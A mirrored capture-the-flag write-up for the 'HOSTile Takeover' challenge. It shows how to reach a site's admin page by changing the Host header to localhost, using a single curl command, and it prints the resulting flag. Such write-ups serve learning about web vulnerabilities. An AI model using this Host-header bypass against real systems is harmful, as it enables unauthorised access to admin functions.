daffainfo
/
ctf-writeup
mirror of https://github.com/daffainfo/ctf-writeup.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
ctf-writeup/SpringForwardCTF 2023/HOSTile Takeover
History
Muhammad Daffa a0b5d31557 feat: added 4 CTFs writeup 2023-03-13 07:45:03 +07:00
..
images feat: added 4 CTFs writeup 2023-03-13 07:45:03 +07:00
README.md feat: added 4 CTFs writeup 2023-03-13 07:45:03 +07:00

README.md

HOSTile Takeover

Seems we're unable to access our important admin portal. It worked perfectly fine when we were at our headquarters. Can you help us out? Try to gain access to the admin page and find the secret key!

https://nicc-hostile-takeover.chals.io

About the Challenge

We have been given a website and We need to access the /admin endpoint

preview

How to Solve?

This chall is about Host Header Attack. We need to change the Host HTTP Header from nicc-hostile-takeover.chals.io to localhost. You can use Repeater on burpsuite or you can use curl like me

curl "https://nicc-hostile-takeover.chals.io/admin" -H "Host: localhost"

flag

nicc{H0ST_H3AdEr_AtTack}